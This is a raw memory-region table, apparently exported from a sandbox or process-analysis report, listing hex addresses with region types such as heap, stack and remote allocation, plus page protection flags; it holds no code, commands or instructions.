1DF03D90000
|
heap
|
page read and write
|
||
76E000
|
stack
|
page read and write
|
||
2ACE000
|
heap
|
page read and write
|
||
23C10F03000
|
trusted library allocation
|
page read and write
|
||
2AD3000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
428A000
|
heap
|
page read and write
|
||
5739000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
F10000
|
unkown
|
page read and write
|
||
A73000
|
unkown
|
page read and write
|
||
73D0000
|
trusted library allocation
|
page execute and read and write
|
||
4281000
|
heap
|
page read and write
|
||
2A7B000
|
heap
|
page read and write
|
||
642000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
231EF000
|
heap
|
page read and write
|
||
1680C6A7000
|
heap
|
page read and write
|
||
2AA0000
|
heap
|
page read and write
|
||
29F7000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
23811000
|
direct allocation
|
page execute and read and write
|
||
3E9B000
|
remote allocation
|
page execute and read and write
|
||
2A96000
|
heap
|
page read and write
|
||
7F40000
|
heap
|
page read and write
|
||
2AE0000
|
heap
|
page read and write
|
||
2CBC000
|
stack
|
page read and write
|
||
1680C69E000
|
heap
|
page read and write
|
||
461E000
|
stack
|
page read and write
|
||
7430000
|
trusted library allocation
|
page read and write
|
||
5F0000
|
heap
|
page read and write
|
||
56E1000
|
trusted library allocation
|
page read and write
|
||
1680C758000
|
heap
|
page read and write
|
||
2BB8000
|
heap
|
page read and write
|
||
2A5F1FF000
|
stack
|
page read and write
|
||
7E80000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
2BE0000
|
trusted library allocation
|
page read and write
|
||
23C0F380000
|
system
|
page execute and read and write
|
||
22F1D000
|
stack
|
page read and write
|
||
1680CA7A000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
652000
|
heap
|
page read and write
|
||
1681CB4A000
|
trusted library allocation
|
page read and write
|
||
23669000
|
direct allocation
|
page execute and read and write
|
||
4281000
|
heap
|
page read and write
|
||
4520000
|
trusted library allocation
|
page execute and read and write
|
||
4281000
|
heap
|
page read and write
|
||
1680A590000
|
heap
|
page read and write
|
||
2A5A000
|
heap
|
page read and write
|
||
6FCF000
|
stack
|
page read and write
|
||
45CE000
|
stack
|
page read and write
|
||
2A50000
|
heap
|
page read and write
|
||
249DB000
|
unclassified section
|
page execute and read and write
|
||
C81000
|
unkown
|
page execute read
|
||
22B0000
|
heap
|
page read and write
|
||
74DB000
|
stack
|
page read and write
|
||
8BD000
|
stack
|
page read and write
|
||
4A02000
|
unclassified section
|
page read and write
|
||
6AE0000
|
direct allocation
|
page read and write
|
||
2DDB000
|
heap
|
page read and write
|
||
2BC0000
|
heap
|
page read and write
|
||
1680D044000
|
trusted library allocation
|
page read and write
|
||
908000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
F38000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
1680A674000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
8E0000
|
heap
|
page read and write
|
||
715C000
|
heap
|
page read and write
|
||
DEE000
|
unkown
|
page read and write
|
||
43AD000
|
heap
|
page read and write
|
||
C50000
|
heap
|
page read and write
|
||
2D90000
|
heap
|
page read and write
|
||
2C00000
|
trusted library allocation
|
page read and write
|
||
2DBC000
|
heap
|
page read and write
|
||
9320000
|
direct allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
1680E14A000
|
trusted library allocation
|
page read and write
|
||
78C3000
|
heap
|
page read and write
|
||
2A80000
|
heap
|
page read and write
|
||
F38000
|
heap
|
page read and write
|
||
4828000
|
trusted library allocation
|
page read and write
|
||
1680DFAE000
|
trusted library allocation
|
page read and write
|
||
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
430000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
2AC3000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
712A000
|
trusted library allocation
|
page read and write
|
||
2D8E000
|
stack
|
page read and write
|
||
F42C000
|
system
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
81AC000
|
stack
|
page read and write
|
||
9340000
|
direct allocation
|
page read and write
|
||
9350000
|
direct allocation
|
page read and write
|
||
64A000
|
heap
|
page read and write
|
||
9A000
|
stack
|
page read and write
|
||
2CB0000
|
heap
|
page readonly
|
||
1680A7E0000
|
heap
|
page readonly
|
||
E10000
|
unkown
|
page readonly
|
||
DF0000
|
unkown
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
481F000
|
stack
|
page read and write
|
||
2A5FC4F000
|
stack
|
page read and write
|
||
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
D6D25FE000
|
stack
|
page read and write
|
||
23C0F4F0000
|
heap
|
page read and write
|
||
410000
|
unkown
|
page read and write
|
||
1680CDF7000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
B60000
|
unkown
|
page read and write
|
||
1DF040E0000
|
heap
|
page read and write
|
||
2ECE000
|
stack
|
page read and write
|
||
C97000
|
unkown
|
page readonly
|
||
4719000
|
direct allocation
|
page execute and read and write
|
||
7846000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
458D000
|
stack
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
2A5FCCD000
|
stack
|
page read and write
|
||
16824870000
|
heap
|
page read and write
|
||
8CF000
|
stack
|
page read and write
|
||
F30000
|
heap
|
page read and write
|
||
81B0000
|
heap
|
page read and write
|
||
1DF03DC0000
|
heap
|
page read and write
|
||
47E0000
|
heap
|
page read and write
|
||
2AC3000
|
heap
|
page read and write
|
||
2A5EAFE000
|
stack
|
page read and write
|
||
23C110BE000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
231DC000
|
stack
|
page read and write
|
||
2C7E000
|
stack
|
page read and write
|
||
B40000
|
unkown
|
page readonly
|
||
4281000
|
heap
|
page read and write
|
||
C60000
|
unkown
|
page read and write
|
||
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
7258000
|
trusted library allocation
|
page read and write
|
||
F4F000
|
heap
|
page read and write
|
||
100000
|
direct allocation
|
page read and write
|
||
591F000
|
stack
|
page read and write
|
||
3E0B000
|
unkown
|
page execute and read and write
|
||
20000
|
unkown
|
page readonly
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
2D38000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
2CD2000
|
unkown
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
7F60000
|
trusted library allocation
|
page read and write
|
||
84A0000
|
direct allocation
|
page read and write
|
||
107E000
|
system
|
page execute and read and write
|
||
53D000
|
stack
|
page read and write
|
||
DF0000
|
unkown
|
page read and write
|
||
73B0000
|
heap
|
page read and write
|
||
47DE000
|
stack
|
page read and write
|
||
2A96000
|
heap
|
page read and write
|
||
2AA4000
|
heap
|
page read and write
|
||
C95000
|
unkown
|
page read and write
|
||
2CAF000
|
stack
|
page read and write
|
||
760000
|
unkown
|
page readonly
|
||
4281000
|
heap
|
page read and write
|
||
2CC4000
|
heap
|
page read and write
|
||
2BE9000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
1680CE7F000
|
trusted library allocation
|
page read and write
|
||
2AB0000
|
trusted library section
|
page read and write
|
||
C71000
|
unkown
|
page readonly
|
||
960000
|
unkown
|
page readonly
|
||
14C1000
|
unkown
|
page readonly
|
||
1680E4A8000
|
trusted library allocation
|
page read and write
|
||
2DB1000
|
heap
|
page read and write
|
||
2A0D000
|
stack
|
page read and write
|
||
2A7B000
|
heap
|
page read and write
|
||
2D92000
|
unkown
|
page read and write
|
||
1680A4B0000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
6AF0000
|
direct allocation
|
page read and write
|
||
7E6E000
|
stack
|
page read and write
|
||
6A4E000
|
stack
|
page read and write
|
||
7470000
|
trusted library allocation
|
page read and write
|
||
2CE0000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
970000
|
unkown
|
page readonly
|
||
7843000
|
heap
|
page read and write
|
||
421000
|
unkown
|
page readonly
|
||
2AA0000
|
trusted library section
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
6D78000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
C50000
|
heap
|
page read and write
|
||
474E000
|
stack
|
page read and write
|
||
72FE000
|
stack
|
page read and write
|
||
2D88000
|
heap
|
page read and write
|
||
1680C851000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
7FF848EBC000
|
trusted library allocation
|
page execute and read and write
|
||
2A5F27B000
|
stack
|
page read and write
|
||
7FF848FB1000
|
trusted library allocation
|
page read and write
|
||
4757000
|
heap
|
page read and write
|
||
2DBD000
|
heap
|
page read and write
|
||
2CC8000
|
trusted library allocation
|
page read and write
|
||
29E0000
|
heap
|
page read and write
|
||
23C10DD0000
|
trusted library allocation
|
page read and write
|
||
2DBC000
|
heap
|
page read and write
|
||
578000
|
stack
|
page read and write
|
||
430000
|
heap
|
page read and write
|
||
1680E5AD000
|
trusted library allocation
|
page read and write
|
||
1DF040E5000
|
heap
|
page read and write
|
||
1681C860000
|
trusted library allocation
|
page read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
7A6000
|
heap
|
page read and write
|
||
72BE000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
7120000
|
trusted library allocation
|
page read and write
|
||
7FF848FE2000
|
trusted library allocation
|
page read and write
|
||
2A2C000
|
stack
|
page read and write
|
||
23312000
|
heap
|
page read and write
|
||
7DEE000
|
stack
|
page read and write
|
||
943F000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4AF000
|
stack
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
2A9D000
|
heap
|
page read and write
|
||
100000
|
direct allocation
|
page read and write
|
||
443C000
|
heap
|
page read and write
|
||
4A5C000
|
unclassified section
|
page read and write
|
||
78AD000
|
heap
|
page read and write
|
||
633000
|
heap
|
page read and write
|
||
8440000
|
trusted library allocation
|
page read and write
|
||
C30000
|
unkown
|
page readonly
|
||
780000
|
heap
|
page read and write
|
||
471D000
|
direct allocation
|
page execute and read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
2A5EDFD000
|
stack
|
page read and write
|
||
29C0000
|
heap
|
page read and write
|
||
340B000
|
unkown
|
page execute and read and write
|
||
4281000
|
heap
|
page read and write
|
||
1680D034000
|
trusted library allocation
|
page read and write
|
||
2319C000
|
stack
|
page read and write
|
||
980000
|
unkown
|
page readonly
|
||
16824A10000
|
heap
|
page execute and read and write
|
||
1D0000
|
unkown
|
page readonly
|
||
1680A66A000
|
heap
|
page read and write
|
||
7FF848E04000
|
trusted library allocation
|
page read and write
|
||
2A5FD4A000
|
stack
|
page read and write
|
||
48C1000
|
direct allocation
|
page execute and read and write
|
||
7420000
|
trusted library allocation
|
page read and write
|
||
2A9B000
|
remote allocation
|
page execute and read and write
|
||
2A5EBFE000
|
stack
|
page read and write
|
||
E30000
|
heap
|
page read and write
|
||
2AEA000
|
heap
|
page read and write
|
||
9370000
|
direct allocation
|
page read and write
|
||
73F0000
|
trusted library allocation
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
23C10F00000
|
trusted library allocation
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
8000000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
1F0000
|
unkown
|
page readonly
|
||
4281000
|
heap
|
page read and write
|
||
2A5EA7E000
|
stack
|
page read and write
|
||
63E000
|
stack
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
2AD4000
|
trusted library allocation
|
page read and write
|
||
1680D02F000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
489B000
|
remote allocation
|
page execute and read and write
|
||
4430000
|
trusted library allocation
|
page execute and read and write
|
||
3F4000
|
heap
|
page read and write
|
||
7450000
|
trusted library allocation
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
C80000
|
unkown
|
page readonly
|
||
4281000
|
heap
|
page read and write
|
||
45D0000
|
heap
|
page execute and read and write
|
||
2D0E000
|
stack
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
2BC8000
|
heap
|
page read and write
|
||
2352E000
|
heap
|
page read and write
|
||
9440000
|
heap
|
page read and write
|
||
29BF000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page read and write
|
||
C8E000
|
unkown
|
page readonly
|
||
9EA000
|
stack
|
page read and write
|
||
230CE000
|
stack
|
page read and write
|
||
1680A722000
|
heap
|
page read and write
|
||
2A20000
|
heap
|
page read and write
|
||
6B20000
|
direct allocation
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
7DF43C710000
|
trusted library allocation
|
page execute and read and write
|
||
7930000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
C71000
|
unkown
|
page readonly
|
||
652000
|
heap
|
page read and write
|
||
9330000
|
direct allocation
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
3F4000
|
heap
|
page read and write
|
||
B2610FD000
|
stack
|
page read and write
|
||
22EDD000
|
stack
|
page read and write
|
||
2AC0000
|
heap
|
page read and write
|
||
2366D000
|
direct allocation
|
page execute and read and write
|
||
451E000
|
stack
|
page read and write
|
||
7F3E000
|
stack
|
page read and write
|
||
2AAF000
|
stack
|
page read and write
|
||
D6D35FF000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
642000
|
heap
|
page read and write
|
||
2A56000
|
heap
|
page read and write
|
||
2D40000
|
heap
|
page read and write
|
||
786A000
|
heap
|
page read and write
|
||
2FAC000
|
unkown
|
page read and write
|
||
22B4000
|
heap
|
page read and write
|
||
2C3E000
|
stack
|
page read and write
|
||
7490000
|
trusted library allocation
|
page read and write
|
||
46C7000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
7942000
|
heap
|
page read and write
|
||
45DA000
|
heap
|
page read and write
|
||
4732000
|
trusted library allocation
|
page read and write
|
||
78C9000
|
heap
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
AB7B000
|
direct allocation
|
page execute and read and write
|
||
D37B000
|
direct allocation
|
page execute and read and write
|
||
7DB000
|
stack
|
page read and write
|
||
64A000
|
heap
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
22B4000
|
heap
|
page read and write
|
||
1680C6F2000
|
heap
|
page read and write
|
||
23C11000000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
29D0000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
2A5E785000
|
stack
|
page read and write
|
||
45F0000
|
direct allocation
|
page execute and read and write
|
||
597C000
|
trusted library allocation
|
page read and write
|
||
C81000
|
unkown
|
page execute read
|
||
2A8B000
|
heap
|
page read and write
|
||
299E000
|
stack
|
page read and write
|
||
6BD0000
|
heap
|
page execute and read and write
|
||
2A4E000
|
stack
|
page read and write
|
||
2AC0000
|
heap
|
page read and write
|
||
2AB0000
|
heap
|
page read and write
|
||
C80000
|
unkown
|
page readonly
|
||
2C02000
|
trusted library allocation
|
page read and write
|
||
8C10000
|
direct allocation
|
page execute and read and write
|
||
1680D022000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
980000
|
unkown
|
page readonly
|
||
21C0000
|
unkown
|
page readonly
|
||
81E7000
|
heap
|
page read and write
|
||
231E0000
|
heap
|
page read and write
|
||
2A68000
|
heap
|
page read and write
|
||
4942000
|
unclassified section
|
page read and write
|
||
7107000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
8D7B000
|
direct allocation
|
page execute and read and write
|
||
E30000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
29E0000
|
heap
|
page read and write
|
||
29DE000
|
stack
|
page read and write
|
||
F30000
|
heap
|
page read and write
|
||
349B000
|
remote allocation
|
page execute and read and write
|
||
29D0000
|
unkown
|
page read and write
|
||
6F8E000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
840000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
476F000
|
stack
|
page read and write
|
||
C40000
|
unkown
|
page readonly
|
||
C95000
|
unkown
|
page read and write
|
||
479F000
|
stack
|
page read and write
|
||
8490000
|
direct allocation
|
page read and write
|
||
29F7000
|
heap
|
page read and write
|
||
B40000
|
unkown
|
page readonly
|
||
25DDB000
|
unclassified section
|
page execute and read and write
|
||
234B9000
|
heap
|
page read and write
|
||
2D50000
|
heap
|
page read and write
|
||
6B00000
|
direct allocation
|
page read and write
|
||
236DE000
|
direct allocation
|
page execute and read and write
|
||
73A0000
|
heap
|
page read and write
|
||
23C10D90000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
7100000
|
trusted library allocation
|
page read and write
|
||
2DB6000
|
heap
|
page read and write
|
||
7F340000
|
trusted library allocation
|
page execute and read and write
|
||
4281000
|
heap
|
page read and write
|
||
7E70000
|
trusted library allocation
|
page execute and read and write
|
||
2A5F0FE000
|
stack
|
page read and write
|
||
2A5EB7D000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
6B50000
|
direct allocation
|
page read and write
|
||
2D2C000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
378000
|
stack
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
1680CCC2000
|
trusted library allocation
|
page read and write
|
||
1680C032000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
234BD000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
719E000
|
heap
|
page read and write
|
||
2DA7000
|
heap
|
page read and write
|
||
2A6E000
|
stack
|
page read and write
|
||
C95000
|
unkown
|
page read and write
|
||
2AA4000
|
heap
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
7856000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
717F000
|
heap
|
page read and write
|
||
2DB6000
|
heap
|
page read and write
|
||
78A4000
|
heap
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
81D3000
|
heap
|
page read and write
|
||
2BFA000
|
trusted library allocation
|
page execute and read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
64A000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
2C05000
|
trusted library allocation
|
page execute and read and write
|
||
2A90000
|
heap
|
page read and write
|
||
2A6F000
|
heap
|
page read and write
|
||
10000
|
unkown
|
page readonly
|
||
2B6A000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
140000
|
direct allocation
|
page read and write
|
||
1680D03D000
|
trusted library allocation
|
page read and write
|
||
1680CF46000
|
trusted library allocation
|
page read and write
|
||
48BD000
|
direct allocation
|
page execute and read and write
|
||
2AD0000
|
unkown
|
page readonly
|
||
2A5F17F000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
D6D2DFE000
|
stack
|
page read and write
|
||
960000
|
unkown
|
page readonly
|
||
23070000
|
heap
|
page read and write
|
||
2D4E000
|
stack
|
page read and write
|
||
1680C650000
|
heap
|
page read and write
|
||
2AA7000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
93A0000
|
direct allocation
|
page read and write
|
||
2A90000
|
heap
|
page read and write
|
||
1680A74C000
|
heap
|
page read and write
|
||
1DF03FB0000
|
heap
|
page read and write
|
||
22F9B000
|
stack
|
page read and write
|
||
7860000
|
heap
|
page read and write
|
||
1681CB3B000
|
trusted library allocation
|
page read and write
|
||
23C0F4C9000
|
heap
|
page read and write
|
||
29E8000
|
heap
|
page read and write
|
||
2A8B000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
CB1000
|
unkown
|
page readonly
|
||
4C1C000
|
unclassified section
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
1680C120000
|
heap
|
page read and write
|
||
7F50000
|
trusted library allocation
|
page execute and read and write
|
||
2A02000
|
heap
|
page read and write
|
||
54DF000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
454C000
|
stack
|
page read and write
|
||
56D1000
|
trusted library allocation
|
page read and write
|
||
7E90000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
2A53000
|
heap
|
page read and write
|
||
7FF848FBA000
|
trusted library allocation
|
page read and write
|
||
6FE1000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
DAC000
|
stack
|
page read and write
|
||
1680A640000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
F312000
|
system
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
2CC4000
|
heap
|
page read and write
|
||
7460000
|
trusted library allocation
|
page read and write
|
||
23C10F0C000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
3F4000
|
heap
|
page read and write
|
||
7FD5000
|
trusted library allocation
|
page read and write
|
||
2A0B000
|
unkown
|
page execute and read and write
|
||
9390000
|
direct allocation
|
page read and write
|
||
CB1000
|
unkown
|
page readonly
|
||
4280000
|
heap
|
page read and write
|
||
7A9B000
|
remote allocation
|
page execute and read and write
|
||
798000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
7440000
|
trusted library allocation
|
page read and write
|
||
2ACE000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
F10000
|
unkown
|
page read and write
|
||
7480000
|
trusted library allocation
|
page read and write
|
||
48B0000
|
heap
|
page read and write
|
||
7FF848E02000
|
trusted library allocation
|
page read and write
|
||
23C110CE000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
1680C660000
|
heap
|
page read and write
|
||
7110000
|
trusted library allocation
|
page read and write
|
||
2A9D000
|
heap
|
page read and write
|
||
46C0000
|
heap
|
page read and write
|
||
56F9000
|
trusted library allocation
|
page read and write
|
||
1680C478000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
1680C6AA000
|
heap
|
page read and write
|
||
2DB1000
|
heap
|
page read and write
|
||
47B0000
|
heap
|
page read and write
|
||
9300000
|
direct allocation
|
page read and write
|
||
1681C851000
|
trusted library allocation
|
page read and write
|
||
1680A7F0000
|
trusted library allocation
|
page read and write
|
||
29C7000
|
heap
|
page read and write
|
||
2C6E000
|
stack
|
page read and write
|
||
23C10F0F000
|
trusted library allocation
|
page read and write
|
||
7858000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
2920000
|
heap
|
page read and write
|
||
2DEC000
|
unkown
|
page read and write
|
||
485E000
|
stack
|
page read and write
|
||
A17B000
|
direct allocation
|
page execute and read and write
|
||
4281000
|
heap
|
page read and write
|
||
1680D006000
|
trusted library allocation
|
page read and write
|
||
1680C590000
|
heap
|
page execute and read and write
|
||
140000
|
direct allocation
|
page read and write
|
||
78A7000
|
heap
|
page read and write
|
||
B60000
|
unkown
|
page read and write
|
||
92E0000
|
heap
|
page readonly
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
675000
|
heap
|
page read and write
|
||
2C20000
|
trusted library allocation
|
page read and write
|
||
784C000
|
heap
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
78C3000
|
heap
|
page read and write
|
||
2ADD000
|
trusted library allocation
|
page execute and read and write
|
||
72E000
|
stack
|
page read and write
|
||
23C0F490000
|
heap
|
page read and write
|
||
1680A74A000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
16824A92000
|
heap
|
page read and write
|
||
C80000
|
unkown
|
page readonly
|
||
46D000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
1D0000
|
unkown
|
page readonly
|
||
7DAF000
|
stack
|
page read and write
|
||
28E0000
|
trusted library allocation
|
page read and write
|
||
83B0000
|
trusted library allocation
|
page read and write
|
||
29CF000
|
unkown
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
6AA0000
|
direct allocation
|
page read and write
|
||
2310F000
|
stack
|
page read and write
|
||
6AC0000
|
direct allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
23C0F4F3000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
23540000
|
direct allocation
|
page execute and read and write
|
||
4932000
|
direct allocation
|
page execute and read and write
|
||
19C000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
10A4000
|
system
|
page execute and read and write
|
||
4DDE000
|
trusted library allocation
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
C95000
|
unkown
|
page read and write
|
||
23C0F3F8000
|
system
|
page execute and read and write
|
||
47E4000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
2A02000
|
heap
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
9380000
|
direct allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
283E000
|
stack
|
page read and write
|
||
733E000
|
stack
|
page read and write
|
||
3F4000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
93FE000
|
stack
|
page read and write
|
||
22B0000
|
heap
|
page read and write
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
7832000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
25FE000
|
stack
|
page read and write
|
||
2B1D000
|
heap
|
page read and write
|
||
7886000
|
heap
|
page read and write
|
||
23C0F4EC000
|
heap
|
page read and write
|
||
662000
|
heap
|
page read and write
|
||
F3D2000
|
system
|
page read and write
|
||
D6D1DFC000
|
stack
|
page read and write
|
||
2B10000
|
heap
|
page read and write
|
||
7140000
|
trusted library allocation
|
page read and write
|
||
2AD0000
|
unkown
|
page readonly
|
||
510000
|
unkown
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
1E0000
|
unkown
|
page readonly
|
||
1680C124000
|
heap
|
page read and write
|
||
E36000
|
heap
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
5C9B000
|
remote allocation
|
page execute and read and write
|
||
7260000
|
heap
|
page execute and read and write
|
||
C8E000
|
unkown
|
page readonly
|
||
B2611FE000
|
unkown
|
page read and write
|
||
81C6000
|
heap
|
page read and write
|
||
C8E000
|
unkown
|
page readonly
|
||
65B000
|
heap
|
page read and write
|
||
6AD0000
|
direct allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
C81000
|
unkown
|
page execute read
|
||
4281000
|
heap
|
page read and write
|
||
23C11001000
|
trusted library allocation
|
page read and write
|
||
2A65000
|
heap
|
page read and write
|
||
4DC6000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
1DF03DA0000
|
heap
|
page read and write
|
||
3F4000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
28E0000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
4750000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
2DAA000
|
heap
|
page read and write
|
||
2FAC000
|
unkown
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
46A0000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
1DF03F90000
|
heap
|
page read and write
|
||
2CCE000
|
unkown
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
2A68000
|
heap
|
page read and write
|
||
2A5E7CF000
|
stack
|
page read and write
|
||
2DD6000
|
heap
|
page read and write
|
||
2840000
|
trusted library allocation
|
page read and write
|
||
816E000
|
stack
|
page read and write
|
||
1098000
|
system
|
page execute and read and write
|
||
C97000
|
unkown
|
page readonly
|
||
4281000
|
heap
|
page read and write
|
||
23C0F3F5000
|
system
|
page execute and read and write
|
||
2A7E000
|
stack
|
page read and write
|
||
23C10DD0000
|
trusted library allocation
|
